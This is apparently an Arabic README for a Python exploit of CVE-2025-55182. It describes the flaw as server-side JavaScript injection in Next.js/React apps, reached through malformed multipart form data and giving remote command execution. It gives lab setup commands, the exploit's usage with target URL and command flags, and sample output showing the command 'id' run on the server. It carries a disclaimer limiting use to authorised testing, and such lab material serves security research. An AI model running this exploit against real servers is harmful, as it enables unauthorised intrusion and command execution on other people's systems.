
استغلال بايثون لـ CVE-2025-55182، حقن JavaScript من جانب الخادم في Next.js/React يتيح تنفيذ التعليمات البرمجية عن بُعد عبر بيانات نموذج متعددة الأجزاء مشوهة. يتضمن إعداد معمل للاختبار المصرح به.
نص برمجي بلغة بايثون 3 يمكن استخدامه لإظهار CVE-2025-55182. يستغل ثغرة حقن JavaScript من جانب الخادم في تطبيقات Next.js/React، مما يسمح بـ تنفيذ الأوامر عن بُعد عبر بيانات نموذج متعددة الأجزاء غير صالحة.
⚠️ لأغراض تعليمية واختبارية مرخص بها فقط.
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start
pip install requests
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
-u النطاق الهدف أو عنوان IP مع البروتوكول - http://localhost:3000 -c الأمر المراد تنفيذه على الخادم - id
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)